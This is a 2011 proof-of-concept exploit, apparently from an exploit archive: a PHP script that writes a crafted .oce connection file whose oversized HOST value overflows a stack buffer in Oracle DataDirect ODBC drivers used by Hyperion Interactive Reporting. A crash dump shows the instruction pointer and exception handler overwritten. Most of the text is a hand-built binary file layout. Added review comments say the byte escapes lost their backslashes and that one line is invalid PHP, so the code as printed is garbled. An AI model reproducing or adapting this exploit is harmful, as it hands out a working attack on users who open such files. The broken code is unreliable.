# Title : Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC
# Published : 2011-10-31
# Author :
<?php
/*
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer
Overflow PoC (*.oce)
by rgod
found a local vector for this:
http://retrogod.altervista.org/9sg_oracle_datadirect.htm
http://www.exploit-db.com/exploits/18007/
This poc will create a suntzu.oce file
which should work against Hyperion Interactive Reporting Studio
which is delivered with Oracle Hyperion Suite.
When the .oce file is clicked, a login box appears; on clicking OK an error message
appears, then another error, then... boom!
description for .oce :
Interactive Reporting database connection file
file association:
"C:OracleMiddleware3EPMSystem11R1productsbiplus\bin\brioqry.exe" "%1"
crash dump, eip and seh overwritten, unicode expanded,
I suppose one should be able to deal with it :
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=0e752eb8 edx=0f490000 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
brioqry+0x10043:
00410043 0152ff add dword ptr [edx-1],edx ds:0023:0f48ffff=????????
0:000> g
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=00410041 edx=7c8285f6 esi=00000000 edi=00000000
eip=00410043 esp=00129f10 ebp=00129f30 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
brioqry+0x10043:
00410043 0152ff add dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00
*/
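/**
 * Rebase a 32-bit little-endian file offset by the length of the HOST filler.
 *
 * The .oce image built below stores absolute offsets; inserting $buff into the
 * DSN pushes every later field forward, so each offset that follows the DSN is
 * passed through here. Only the first 4 bytes of $x are read (the call sites
 * pass longer literals).
 *
 * The original read the filler through `global $buff`; the base is now an
 * optional argument that falls back to that same global, so every existing
 * one-argument call site behaves exactly as before.
 *
 * @param string      $x    at least 4 bytes; bytes 0-3 are a little-endian uint32
 * @param string|null $base bytes whose length is added; null selects $GLOBALS['buff']
 * @return string the sum packed back as 4 little-endian bytes (pack('V') keeps the low 32 bits)
 * @throws \InvalidArgumentException when $x holds fewer than 4 bytes
 */
function _x(string $x, $base = null): string
{
    if (strlen($x) < 4) {
        // unpack('V') on a short string warns and returns false; fail loudly instead
        throw new \InvalidArgumentException(
            '_x(): expected at least 4 bytes, got ' . strlen($x)
        );
    }
    if ($base === null) {
        // Same source as the original `global $buff`; an unset global counts as empty.
        $base = isset($GLOBALS['buff']) ? $GLOBALS['buff'] : '';
    }
    $offset = unpack('V', $x)[1] + strlen($base);
    return pack('V', $offset);
}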
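// HOST value: a plausible hostname, 16 spaces, then the 4000-byte filler that
// overruns the HOST buffer in arsqls24.dll (see the title comment above).
// NOTE(review): the escape sequences on this page print as "x20"/"x41" rather
// than "\x20"/"\x41" — the backslashes appear to have been lost during
// extraction. The literals are kept exactly as printed.
$buff = "mydatabase.com".
str_repeat("x20",16). //cosmetics, no AAAA... inside the login box
str_repeat("x41",4000);
//$dsn="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;";
//$dsn="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null";
$dsn="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=XXXXXXXXX;";
// Pad the DSN to the fixed 166-byte slot the header expects. The original
// `while (strlen($dsn) != 166) $dsn .= "x20";` loop never terminates when the
// length steps past 166 (a multi-byte pad unit, or a DSN that is already longer
// than 166); str_pad() stops at exactly 166 and is a no-op for longer input.
$dsn = str_pad($dsn, 166, "x20");
// Splice the oversized HOST value into the padded DSN; every offset that
// follows the DSN in the image is rebased by strlen($buff) through _x().
$dsn = str_replace("HOST=;", "HOST=".$buff.";", $dsn);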
// Build the .oce image as one string: a "#BRIF BIN001" magic, a header-length
// word, the path of the originating .oce (with a length word in front of it),
// the padded DSN, and then a long run of length-prefixed field names, each
// followed by what look like a flag word, a type word and a file offset.
// Every offset that comes after the DSN goes through _x() so the extra bytes
// inserted into HOST are accounted for.
// NOTE(review): as printed on this page the escapes read "x00", "x01", ... with
// the backslash missing, so the literals below are ASCII text rather than the
// bytes the length words describe; e.g. the path literal is 0x37 = 55 bytes
// only if each "x20" is a single space byte. Also, the `_x(""x01x00x00")`
// argument further down is not valid PHP as printed (presumably an escaped
// quote character, 0x22, in the original). Kept byte-for-byte; nothing here
// has been "repaired".
$dump=
"#BRIFx20BIN001". // file magic
"x00x00x00x00".
_x("x7bx07x00x00"). //header length, increase counter
"x37x00x00x00". //path length
"D:\Documentsx20andx20Settings\Admin\Desktop\Predefinito.oce". // originating .oce path
"x01x00x01x00".
"x00x00x07x00".
"x00x00x0ax00".
"x00x00".
_x("xa6x00x00x00"). //dsn length
$dsn. // 166-byte DSN slot carrying the inflated HOST value
"x00x00x00x00".
"x00x00x00x00".
"x04x00x00x00".
"True".
"x00x00x00x00x01x00x00x00x00x00x00x00x00x00".
"x00x00x00x01x00x01x00x00x01x00x00x00x00x00x00x00".
"x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x01x00x00x00@x00x00".
"x00x00x00x00x00x00x00x00@x00x00x00x04x00x00x00x00".
"x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00x00".
"x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00x04".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x04x00x00x00rx00x00x00".
"ColItem.Table". // column-item table: each name is preceded by its length word
"x01x00".
"x00x00x04x00x00x00x12x00x00x00".
"ColItem.TableAlias".
"x01x00x00x00x10x00".
"x00x00rx00x00x00".
"ColItem.Owner".
"x01x00x00x00x1cx00x00x00x0cx00x00".
"x00".
"ColItem.Type".
"x01x00x00x00(x00x00x00x03x00x00x00x06x00x00x00".
"Source".
"x01x00x00x00x05x00x00x004x00x00x00x05x00x00x00".
"Where".
"x01".
"x00x00x00x05x00x00x008x00x00x00x07x00x00x00".
"OrderBy".
"x01x00".
"x00x00x05x00x00x00<x00x00x00|x00x00x00x04x00x00x00".
"x00x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00".
"x00x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00".
"x04x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00".
"x00x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00".
"x00x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00".
"x04x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x09x00x00x00x0cx00x00x00ColItem.Namex01x00x00x00".
"x04x00x00x00x10x00x00x00".
"ColItem.ColAlias".
"x01x00x00x00x10x00x00x00".
"x0ex00x00x00".
"ColItem.ColNum".
"x01x00x00x00x1cx00x00x00x0fx00x00x00".
"ColItem.ColType".
"x01x00x00x00(x00x00x00x10x00x00x00".
"ColItem.NumBytes".
"x01x00x00x004x00".
"x00x00x0ex00x00x00".
"ColItem.Places".
"x01x00x00x00@x00x00x00x0ex00x00".
"x00".
"ColItem.Digits".
"x01x00x00x00Lx00x00x00rx00x00x00".
"ColItem.Nulls".
"x01x00x00x00Xx00".
"x00x00x12x00x00x00".
"ColItem.NativeType".
"x01x00x00x00dx00x00x00x03x00x00".
"x00x06x00x00x00".
"Source".
"x01x00x00x00x05x00x00x00px00x00x00".
"x05x00x00x00".
"Where".
"x01x00x00x00x05x00x00x00tx00x00x00x07".
"x00x00x00".
"OrderBy".
"x01x00x00x00x05x00x00x00xx00x00x000x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x0bx00x00x00x06x00x00x00".
"PTable". // primary/foreign key descriptor names
"x01x00x00x00x05x00x00".
"x00x04x00x00x00x06x00x00x00".
"POwner".
"x01x00x00x00x05x00x00".
"x00x08x00x00x00x07x00x00x00".
"PDBName".
"x01x00x00x00x05x00x00".
"x00x0cx00x00x00x08x00x00x00".
"PColName".
"x01x00x00x00x05x00x00".
"x00x10x00x00x00x06x00x00x00".
"FTable".
"x01x00x00x00x05x00x00".
"x00x14x00x00x00x06x00x00x00".
"FOwner".
"x01x00x00x00x05x00x00".
"x00x18x00x00x00x07x00x00x00".
"FDBName".
"x01x00x00x00x05x00x00".
"x00x1cx00x00x00x08x00x00x00".
"FColName".
"x01x00x00x00x05x00x00".
"x00x20x00x00x00x06x00x00x00".
"SeqKey".
"x01x00x00x00x05x00x00".
"x00$x00x00x00x06x00x00x00".
"Source".
"x01x00x00x00x05x00x00x00".
"(x00x00x00x05x00x00x00".
"Where".
"x01x00x00x00x05x00x00x00,x00".
"x00x00)x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00n".
"x00x00".
"x00x09x00x00x00".
"SrcDBName". // lookup / limit-map descriptor names
"x01x00x00x00x05x00x00x00x04x00x00".
"x00x08x00x00x00".
"SrcOwner".
"x01x00x00x00x05x00x00x00x08x00x00".
"x00x08x00x00x00".
"SrcTable".
"x01x00x00x00x05x00x00x00x0cx00x00".
"x00x08x00x00x00".
"LookupID".
"x01x00x00x00x05x00x00x00x10x00x00".
"x00x0bx00x00x00".
"ColumnValue".
"x01x00x00x00x05x00x00x00x14x00x00".
"x00x11x00x00x00".
"ColumnDescription".
"x01x00x00x00x05x00x00x00x18x00x00".
"x00x0cx00x00x00".
"LimitMapFrom".
"x01x00x00x00x05x00x00x00x1cx00x00".
"x00rx00x00x00".
"LimitMapWhere".
"x01x00x00x00x05x00x00x00x20x00x00x00".
"x0bx00x00x00".
"LookupWhere".
"x01x00x00x00x05x00x00x00$x00x00x00x0e".
"x00x00x00".
"IsCustomLookup".
"x01x00x00x00x01x00x00x00(x00x00x00x04x00".
"x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00".
"x01x08x00x00x00x00x00x00x00x00x00x00x00x01x00x00".
"x00x0cx00x00x00".
"NumTableTabs".
"x01x00x00x00x03x00x00x00x04x00x00".
"x00x08x00x00x00x00x00x00x00x00x00x00x00x01x00x00".
"x00rx00x00x00".
"NumColumnTabs".
"x01x00x00x00x03x00x00x00x04x00x00x00".
"x8ax00x00x00x17x00x00x00yyyy-mm-ddx20HH:MM:SS.fffx17x00x00x00yyyy-mm-ddx20HH:MM:SS.fffx17x00". // date/time format strings
"x00x00yyyy-mm-ddx20HH:MM:SS.fffn".
"x00x00x00yyyy-mm-ddx08x00x00x00HH:MM:SSx17x00x00x00yyyy-mm-ddx20HH:MM:SS.fffx00".
"x00x00x00x01x00x00x00x08x00x00x00DateAttrx06x00x00x00x05".
"x00x00x00x04x00x00x00x08x00x00x00x12x00x00x00".
"TableCat.DaOCEPref". // from here on every trailing offset is rebased through _x()
"x01x00x00x00".
_x("Nx01x00x00").
"x10x00x00x00".
"ColCat.DaOCEPref".
"x01x00x00x00".
_x("@x02x00x00").
"x11x00x00x00".
"FKeyCat.DaOCEPref".
"x01x00x00x00".
_x("xf6x03x00x00").
"x15x00x00x00".
"LimitMapSQL.DaOCEPref".
"x01x00x00x00".
_x("%x05x00x00").
"x15x00x00x00".
"TableFilter.DaOCEPref".
"x01x00x00x00".
_x("ex06x00x00").
"x15x00x00x00".
"TableRemarks.DMParams".
"x01x00x00x00".
_x("xx06x00x00").
"x16x00x00x00".
"ColumnRemarks.DMParams".
"x01x00x00x00".
_x("xa4x06x00x00").
"x14x00x00x00".
"DateFormats.DMParams".
"x01x00x00x00".
_x("xd1x06x00x00").
":x00x00x00".
"x0ex00x00x00".
"OpenCatalogExt". // connection preference records: length, name, flag, type, offset
"x01x00x00x00".
"x05x00x00x00".
"x04x00x00x00".
"x06x00x00x00".
"IsUTF8".
"x01x00x00x00".
"x01x00x00x00".
"?x00x00x00".
"x07x00x00x00".
"SavePwd".
"x01x00x00x00".
"x01x00x00x00".
"@x00x00x00".
"x08x00x00x00".
"ConnType".
"x01x00x00x00".
"x03x00x00x00".
"Ax00x00x00".
"x07x00x00x00".
"ApiCode".
"x01x00x00x00".
"x03x00x00x00".
"Ex00x00x00".
"x07x00x00x00".
"SvrCode".
"x01x00x00x00".
"x03x00x00x00".
"Ix00x00x00".
"x08x00x00x00".
"Extra1_1".
"x01x00x00x00".
"x05x00x00x00".
"Mx00x00x00".
"x06x00x00x00".
"CurrDB".
"x01x00x00x00".
"x05x00x00x00".
_x("xf7x00x00x00").
"x06x00x00x00".
"DBList".
"x01x00x00x00".
"x05x00x00x00".
_x("xfbx00x00x00").
"rx00x00x00".
"MetaData_Save".
"x01x00x00x00".
"x05x00x00x00".
_x("xffx00x00x00").
"x0bx00x00x00".
"MetaDataKey".
"x01x00x00x00".
"x03x00x00x00".
_x("x07x01x00x00").
"x12x00x00x00".
"InformaticaWritten".
"x01x00x00x00".
"x01x00x00x00".
_x("x0bx01x00x00").
"x0cx00x00x00".
"SelectCommit".
"x01x00x00x00".
"x03x00x00x00".
_x("x0cx01x00x00").
"x0bx00x00x00".
"DBCancelOpt".
"x01x00x00x00".
"x03x00x00x00".
_x("x10x01x00x00").
"nx00x00x00".
"StringMode".
"x01x00x00x00".
"x01x00x00x00".
_x("x14x01x00x00").
"x0bx00x00x00".
"EdaHardQuit".
"x01x00x00x00".
"x01x00x00x00".
_x("x15x01x00x00").
"x08x00x00x00".
"DisTrans".
"x01x00x00x00".
"x01x00x00x00".
_x("x16x01x00x00").
"x08x00x00x00".
"UpdValid".
"x01x00x00x00".
"x01x00x00x00".
_x("x17x01x00x00").
"nx00x00x00".
"UseODBCDlg".
"x01x00x00x00".
"x01x00x00x00".
_x("x18x01x00x00").
"x09x00x00x00".
"JoinInfoQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x19x01x00x00").
"nx00x00x00".
"GuessJoinQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1ax01x00x00").
"x0bx00x00x00".
"CustomJoinQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1bx01x00x00").
"x0bx00x00x00".
"CustTblQryQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1cx01x00x00").
"x09x00x00x00".
"FastModeQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1dx01x00x00").
"nx00x00x00".
"CurrOCETab".
"x01x00x00x00".
"x03x00x00x00".
_x("x1ex01x00x00").
"x07x00x00x00".
"CurrTab".
"x01x00x00x00".
"x03x00x00x00".
_x(""x01x00x00"). // NOTE(review): not valid PHP as printed — see the note at the top of this statement
"rx00x00x00".
"CurrRepManTab".
"x01x00x00x00".
"x03x00x00x00".
_x("&x01x00x00").
"x0ex00x00x00".
"UseODBCDBNameQ".
"x01x00x00x00".
"x01x00x00x00".
_x("*x01x00x00").
"nx00x00x00".
"UseTblSqlQ".
"x01x00x00x00".
"x01x00x00x00".
_x("+x01x00x00").
"x07x00x00x00".
"QuotedQ".
"x01x00x00x00".
"x01x00x00x00".
_x(",x01x00x00").
"x09x00x00x00".
"ChangeDBQ".
"x01x00x00x00".
"x01x00x00x00".
_x("-x01x00x00").
"rx00x00x00".
"SaveUserNameQ".
"x01x00x00x00".
"x01x00x00x00".
_x(".x01x00x00").
"x0cx00x00x00".
"UseTimeLimit".
"x01x00x00x00".
"x01x00x00x00".
_x("/x01x00x00").
"x09x00x00x00".
"TimeLimit".
"x01x00x00x00".
"x03x00x00x00".
_x("0x01x00x00").
"x0cx00x00x00".
"AllowNonJoin".
"x01x00x00x00".
"x01x00x00x00".
_x("4x01x00x00").
"x07x00x00x00".
"MDDMode".
"x01x00x00x00".
"x01x00x00x00".
_x("5x01x00x00").
"nx00x00x00".
"PacketSize".
"x01x00x00x00".
"x03x00x00x00".
_x("6x01x00x00").
"x0cx00x00x00".
"DisableAsync".
"x01x00x00x00".
"x01x00x00x00".
_x(":x01x00x00").
"x06x00x00x00".
"IsHPIW".
"x01x00x00x00".
"x01x00x00x00".
_x(";x01x00x00").
"x10x00x00x00".
"RetainDateFormat".
"x01x00x00x00".
"x01x00x00x00".
_x("<x01x00x00").
"x10x00x00x00".
"AdvSetOperations".
"x01x00x00x00".
"x01x00x00x00".
_x("=x01x00x00").
"x10x00x00x00".
"MemberProperties".
"x01x00x00x00".
"x01x00x00x00".
_x(">x01x00x00").
"x1cx00x00x00".
"UseOracleOuterJoinOpOnLimits".
"x01x00x00x00".
"x01x00x00x00".
_x("?x01x00x00").
"x18x00x00x00".
"UseODBCOuterJoinOnLimits".
"x01x00x00x00".
"x01x00x00x00".
_x("@x01x00x00").
"x16x00x00x00".
"UseODBCOuterJoinSyntax".
"x01x00x00x00".
"x01x00x00x00".
_x("Ax01x00x00").
"x10x00x00x00".
"OracleBufferSize".
"x01x00x00x00".
"x03x00x00x00".
_x("Bx01x00x00").
"x08x00x00x00".
"CustTblQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Fx01x00x00").
"x08x00x00x00".
"CustColQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Gx01x00x00").
"x0cx00x00x00".
"FilterOwnerQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Hx01x00x00").
"x0cx00x00x00".
"FilterTableQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Ix01x00x00").
"x0bx00x00x00".
"FilterTypeQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Jx01x00x00").
"x0cx00x00x00".
"DefineTableQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Kx01x00x00").
"x0cx00x00x00".
"DefineOwnerQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Lx01x00x00").
"x0bx00x00x00".
"DefineTypeQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Mx01x00x00").
"x15x00x00x00".
"FilterBRIOTblsSetting".
"x01x00x00x00".
"x01x00x00x00".
_x("qx06x00x00").
"x19x00x00x00".
"UseDifferentRepConnection".
"x01x00x00x00".
"x01x00x00x00".
_x("rx06x00x00").
"x11x00x00x00".
"MetaDataOwnerName".
"x01x00x00x00".
"x05x00x00x00".
_x("sx06x00x00").
"x09x00x00x00".
"AdvOption".
"x01x00x00x00".
"x01x00x00x00".
_x("wx06x00x00").
"x00"; // terminator
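// Write the generated connection file next to the script. file_put_contents()
// signals failure (unwritable directory, disk full) by returning false rather
// than throwing, so the result is checked instead of being silently dropped.
if (file_put_contents("suntzu.oce", $dump) === false) {
    throw new \RuntimeException('could not write suntzu.oce');
}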
?>